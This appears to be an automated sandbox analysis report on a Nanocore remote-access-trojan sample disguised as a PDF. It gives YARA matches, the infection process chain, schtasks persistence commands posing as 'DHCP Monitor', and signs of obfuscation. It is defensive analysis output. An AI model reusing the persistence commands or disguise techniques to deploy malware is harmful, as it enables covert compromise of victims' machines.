      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00C0F122
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EF5F0 appears 31 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEC50 appears 56 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEB78 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BC0DC0 appears 38 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BBFD60 appears 39 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_003D6FAA
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGDWsrap.exe@ vs 004349256789197.pdf.scr.exe
      Source: 004349256789197.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@43/45@28/1
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Windows\win.iniJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6C74 GetLastError,FormatMessageW,0_2_003D6C74
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_003EA6C2
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: 004349256789197.pdf.scr.exeReversingLabs: Detection: 44%
      Source: 004349256789197.pdf.scr.exeVirustotal: Detection: 39%
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Users\user\Desktop\004349256789197.pdf.scr.exeJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\004349256789197.pdf.scr.exe C:\Users\user\Desktop\004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder10_51
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C24089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,6_2_00C24089
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C2AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_00C2AFDB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxname0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxstime0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: STARTDLG0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: xzB0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.ini
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: 004349256789197.pdf.scr.exeStatic file information: File size 1181640 > 1048576
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 004349256789197.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF640 push ecx; ret 0_2_003EF653
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EEB78 push eax; ret 0_2_003EEB96
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C362CC pushad ; ret 6_2_00C362D6
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BF0332 push edi; ret 6_2_00BF0333
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0E06 push ecx; ret 6_2_00BC0E19
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00BA5D78
      Source: 004349256789197.pdf.scr.exeStatic PE information: section name: .didat
      Source: ihgsvw.exe.0.drStatic PE information: real checksum: 0x15a0e8 should be: 0x1560ce
      Source: 004349256789197.pdf.scr.exeStatic PE information: real checksum: 0x0 should be: 0x12da1b
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\__tmp_rar_sfx_access_check_3874750
